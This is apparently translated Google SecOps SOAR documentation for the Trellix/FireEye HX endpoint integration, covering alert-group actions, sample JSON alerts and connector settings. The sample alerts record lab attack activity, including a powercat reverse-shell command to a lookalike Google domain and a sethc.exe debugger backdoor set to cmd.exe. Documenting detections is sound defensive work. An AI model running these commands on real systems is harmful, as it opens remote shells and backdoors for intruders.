"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T09:26:14.114Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8740,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 2
},
"url": "/hx/api/v3/alert_groups/e9f4d7baaa362d9d5d0b6e053ba0d44d",
"created_at": "2020-12-10T08:04:54.740Z",
"acknowledgement": {
"acknowledged": true,
"acknowledged_by": "test2",
"acknowledged_time": "2020-12-22T19:00:25.688Z",
"comment": "test comment",
"comment_update_time": "2020-12-22T19:00:25.688Z"
},
"grouped_by": {
"condition_id": "2npvcLf_arxPaH717hQZ9g==",
"detected_by": "ioc_engine",
"host": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"primary_ip_address": "172.30.202.152"
}
}
}
]
},
"message": "OK",
"details": [],
"route": "/hx/api/v3/alert_groups"
}
Case Wall
| Tipo de resultado | Valor/descrição | Tipo |
|---|---|---|
| Mensagem de saída* | A ação não deve falhar nem parar a execução de um playbook: "Successfully updated acknowledgement status for all alert groups" (O estado de confirmação de todos os grupos de alertas foi atualizado com êxito) Se alguns forem bem-sucedidos e outros não: (o número de IDs fornecidos for superior ao total) - "Foram obtidos alertas com êxito para os seguintes IDs de grupos de alertas: {succesfull_alert_groups_ids}" Se não tiverem sido obtidos detalhes do grupo de alertas: "Não foi possível obter alertas para nenhum ID de grupo de alertas fornecido. Verifique os IDs facultados e tente novamente" A ação deve falhar e parar a execução de um manual de procedimentos: |
Geral |
Obtenha grupos de alertas de anfitriões
Descrição
Liste grupos de alertas relacionados com um anfitrião no Trellix Endpoint Security. Entidades suportadas: nome de anfitrião, endereço IP.
Parâmetros
| Nome a apresentar do parâmetro | Tipo | Valor predefinido | É obrigatório | Descrição |
|---|---|---|---|---|
| Filtro de reconhecimento | LDD | TUDO Apenas confirmado Apenas não reconhecidos |
Não | Especifique se quer devolver todos os grupos de alertas ou apenas os reconhecidos/não reconhecidos. |
| Número máximo de grupos de alertas a devolver | Número inteiro | 20 | Não | Especifique quantos grupos de alertas devolver por entidade. Predefinição: 20. |
Executar em
Esta ação é executada nas seguintes entidades:
- Endereço IP
- Nome do anfitrião
Resultados da ação
Resultado do script
| Nome do resultado do script | Opções de valor | Exemplo |
|---|---|---|
| is_success | Verdadeiro/Falso | is_success:False |
Resultado JSON
{
"_id": "6d9a68f2a78f8d983bd3c0f4556785e6",
"assessment": "[Heur.BZC.ONG.Cheetah.3.1C89233F]",
"file_full_path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"first_event_at": "2021-07-01T09:44:18.809Z",
"last_event_at": "2021-07-01T09:44:18.809Z",
"dispositions": [],
"source": "MAL",
"has_fp_disposition": false,
"last_alert": {
"_id": 812,
"agent": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"containment_state": "normal"
},
"event_at": "2021-07-01T09:44:18.809+00:00",
"matched_at": "2021-07-01T09:44:18.809+00:00",
"reported_at": "2021-07-01T09:44:20.353+00:00",
"source": "MAL",
"resolution": "QUARANTINED",
"decorators": [],
"md5values": [
"36be03ea88f7d1effcafeeb65e0e1e57"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/812",
"condition": null,
"event_id": null,
"event_type": null,
"event_values": {
"system-data": {
"xmlns": "http://www.fireeye.com/antimalware-alert",
"xmlns:xsi": "http://www.w3.org/2001/XMLSchema-instance",
"xsi:schemaLocation": "http://www.fireeye.com/antimalware-alert AM-alert.xsd",
"alert-version": "3",
"correlation-id": "d01e8ea6-4d34-4005-8482-3ccc026e11ea",
"timestamp": "2021-07-01T09:44:18.809Z",
"product-version": "32.36.0",
"engine-version": "11.0.1.19",
"content-version": "7.86346",
"mg-engine-version": "32.30.0.8460",
"mg-content-version": "25",
"whitelist-schema-version": "1.0.0",
"whitelist-content-version": "1.32.1"
},
"os-details": {
"$": {
"name": "windows",
"version": "10.0.14393",
"patch": "0",
"os-arch": "64-bit",
"os-language": "en-US"
}
},
"scan-type": "oas",
"scanned-object": {
"scanned-object-type": "file-event",
"file-event": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"actor-process": {
"pid": "1268",
"path": "C:\\Windows\\System32\\xcopy.exe",
"user": {
"username": "",
"domain": ""
}
},
"sub-type": "FILE_OPERATION_CLOSED"
}
},
"detections": {
"detection": [
{
"engine": {
"engine-type": "av",
"engine-version": "11.0.1.19",
"content-version": "7.86346"
},
"infected-object": {
"object-type": "file",
"file-object": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"inner-file-path": "",
"original-file-name": "",
"container": "false",
"packed": "false",
"hidden": "false",
"system-file": "false",
"read-only": "false",
"temporary": "false",
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"sha1sum": "ce1cdd84732367cbf2be60df57c52760bf2e8fe9",
"sha256sum": "3862ddf0a77ef8e7e17c641939a6dc349885c1a08cd64748ec50358adafe0631",
"size-in-bytes": "753",
"creation-time": "2021-07-01T09:41:47.610Z",
"modification-time": "2020-05-29T09:34:17.066Z",
"access-time": "2021-07-01T09:41:47.610Z"
}
},
"infection": {
"confidence-level": "high",
"infection-type": "malware",
"infection-name": "Heur.BZC.ONG.Cheetah.3.1C89233F"
},
"action": {
"actioned-object": {
"object-type": "file",
"file-object": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"inner-file-path": "",
"original-file-name": "",
"container": "false",
"packed": "false",
"hidden": "false",
"system-file": "false",
"read-only": "false",
"temporary": "false",
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"sha1sum": "ce1cdd84732367cbf2be60df57c52760bf2e8fe9",
"sha256sum": "3862ddf0a77ef8e7e17c641939a6dc349885c1a08cd64748ec50358adafe0631",
"size-in-bytes": "753",
"creation-time": "2021-07-01T09:41:47.610Z",
"modification-time": "2020-05-29T09:34:17.066Z",
"access-time": "2021-07-01T09:41:47.610Z"
}
},
"requested-action": "clean",
"applied-action": "quarantine",
"result": "success",
"error": "0",
"reboot-required": "false"
}
}
]
},
"scan-statistics": {
"total-scan-time-in-ms": "12227"
}
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/6d9a68f2a78f8d983bd3c0f4556785e6",
"created_at": "2021-07-01T09:44:23.726Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"infection-name": "Heur.BZC.ONG.Cheetah.3.1C89233F",
"detected_by": "malware_file_access_scan",
"host": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"primary_ip_address": "172.30.202.71"
}
}
},
{
"_id": "0043aa34dea99c23996c2f16291cdb4e",
"assessment": "[Process powershell.exe started] POWERCAT (UTILITY)",
"file_full_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"first_event_at": "2021-07-01T09:41:50.428Z",
"last_event_at": "2021-07-01T09:41:50.428Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 811,
"agent": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"containment_state": "normal"
},
"condition": {
"_id": "KBvTAC_L_GiI9BZbph2GoA==",
"url": "/hx/api/v3/conditions/KBvTAC_L_GiI9BZbph2GoA=="
},
"event_at": "2021-07-01T09:41:50.428+00:00",
"matched_at": "2021-07-01T09:43:29+00:00",
"reported_at": "2021-07-01T09:44:09.339+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"097ce5761c89434367598b34fe32893b"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/811",
"event_id": 11311494,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2021-07-01T09:41:50.428Z",
"processEvent/eventType": "start",
"processEvent/pid": 3676,
"processEvent/processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"processEvent/process": "powershell.exe",
"processEvent/parentPid": 2496,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2021-07-01T09:41:50.428Z",
"processEvent/md5": "097ce5761c89434367598b34fe32893b",
"processEvent/processCmdLine": "powershell -Exec Bypass \". \\\"C:\\TMP\\nc.ps1\\\";powercat -c www.googleaccountsservices.com -p 80 -t 2 -e cmd\""
},
"multiple_match": "Multiple Indicators Matched.",
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/0043aa34dea99c23996c2f16291cdb4e",
"created_at": "2021-07-01T09:44:13.744Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"condition_id": "KBvTAC_L_GiI9BZbph2GoA==",
"detected_by": "ioc_engine",
"host": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"primary_ip_address": "172.30.202.71"
}
}
Case Wall
| Tipo de resultado | Valor/descrição | Tipo |
|---|---|---|
| Mensagem de saída\* | A ação não deve falhar nem parar a execução de um manual de procedimentos: if data is not available for one(is_success = true): "Action wasn't able to retrieve alert groups for the following entities in Trellix Endpoint Security: {entity.identifier}". Se os dados não estiverem disponíveis para todas as entidades(is_success=false): "Não foram encontrados grupos de alertas para as entidades fornecidas no Trellix Endpoint Security". A ação deve falhar e parar a execução de um playbook: |
Geral |
| Tabela de parede da caixa | Colunas:
|
Entidade |
Conetores
Conetor de alertas do FireEye HX
Descrição
O conetor de alertas de segurança de pontos finais da Trellix do Google SecOps SOAR carrega alertas gerados no servidor de segurança de pontos finais da Trellix.
O conector liga-se periodicamente ao ponto final do servidor da API Trellix Endpoint Security e extrai uma lista de alertas gerados para um período específico. Se existirem novos alertas, o conector cria alertas do SOAR do Google SecOps com base nos alertas do Trellix Endpoint Security e guarda a data/hora do conector como a última data/hora de alerta carregada com êxito. Na próxima execução do conetor, o conetor vai consultar a API Trellix Endpoint Security apenas para alertas criados a partir da data/hora (data/hora mais algum desvio "técnico" para não "bloquear" o conetor). Se não forem encontrados novos alertas, termine a execução atual.
Autorizações da API
O conector de alertas de segurança de endpoints da Trellix usa os mesmos métodos de autenticação de API e autorizações que a integração do FireEye existente. Para funcionar com alertas do FireEye, a conta que vai ser usada para a integração deve ter uma função de "analista de API" ou "administrador de API".
Configure o conetor de alertas do FireEye HX no Google SecOps
Para ver instruções detalhadas sobre como configurar um conetor no Google SecOps, consulte o artigo Configurar o conetor.
Parâmetros do conetor
Use os seguintes parâmetros para configurar o conector:
| Nome a apresentar do parâmetro | Tipo | Valor predefinido | É obrigatório | Descrição |
|---|---|---|---|---|
| Nome do campo do produto | String | ProductName | Sim | A descrição definida pela plataforma é um campo imutável. |
| Nome do campo de evento | String | AlertName | Sim | A descrição definida pela plataforma é um campo imutável. |
| Nome do campo do ambiente | String | "" | Não | Descreve o nome do campo onde o nome do ambiente está armazenado. Se o campo do ambiente não for encontrado, o ambiente é "". |
| Padrão de regex do ambiente | String | .* | Não | Um padrão de regex a executar no valor encontrado no campo "Nome do campo do ambiente". A predefinição é .* para captar tudo e devolver o valor inalterado. Usado para permitir que o utilizador manipule o campo do ambiente através da lógica de regex Se o padrão de regex for nulo ou estiver vazio, ou o valor do ambiente for nulo, o resultado do ambiente final é "". |
| Limite de tempo do script (segundos) | Número inteiro | 180 | Sim | Limite de tempo limite para o processo Python que executa o script atual. |
| Raiz da API | String | https://x.x.x.x:<port> | Sim | URL raiz da API do Trellix Endpoint Security Server |
| Nome de utilizador | String | N/A | Sim | Utilizador do Trellix Endpoint Security para autenticação |
| Palavra-passe | Palavra-passe | N/A | Sim | Palavra-passe do utilizador do Trellix Endpoint Security para autenticação |
| Validar SSL | Caixa de verificação | Marcado | Sim | Se especificado, o conector verifica se o Trellix Endpoint Security está configurado com um certificado SSL válido. Se o certificado não for válido, o conetor devolve um erro. |
| Tempo de desvio em horas | Número inteiro | 24 | Sim | Obter alertas de X horas anteriores. |
| Máximo de alertas por ciclo | Número inteiro | 25 | Sim | Quantos alertas devem ser processados durante uma execução do conetor. |
| Tipo de alerta | String | active_threat | Não | Especifique que tipos de alertas do Trellix Endpoint Security devem ser carregados. Por predefinição, está definido como active_threat para devolver alertas no estado ALERT e QUARANTINED/partial_block. Outro parâmetro válido é ALERT, que devolve apenas alertas abertos. |
| Use a lista de autorizações como uma lista negra | Caixa de verificação (caixa de verificação) | Desmarcado | Sim | Se estiver ativada, a lista de autorizações é usada como uma lista negra. |
| Endereço do servidor proxy | IP_OR_HOST | N/A | Não | Servidor proxy a usar para a ligação. |
| Nome de utilizador do servidor proxy | String | N/A | Não | Nome de utilizador do servidor proxy. |
| Palavra-passe do servidor proxy | Palavra-passe | N/A | Não | Palavra-passe do servidor proxy. |
Regras do conetor
- Lista negra As regras da lista negra devem ser suportadas, mas o conector usa a lógica da lista de autorizações por predefinição.
- Regras da lista de autorizações usadas por predefinição.
- Suporte de proxy O conetor suporta proxy.
- Default ConnectorRules
| RuleType(Whitelist \ Blacklist) | RuleName (string) |
|---|---|
| WhiteList | Especifique nesta secção que alertas ingerir com base nos atributos de origem e subtipo de alerta, por exemplo: "IOC" para alertas de indicadores, "MAL AV" para ingerir apenas alertas de software malicioso com o subtipo "AV" ou "MAL" para ingerir todos os alertas de software malicioso, independentemente do subtipo. Para carregar todos os alertas, remova tudo da secção da lista de autorizações. |
Precisa de mais ajuda? Receba respostas de membros da comunidade e profissionais da Google SecOps.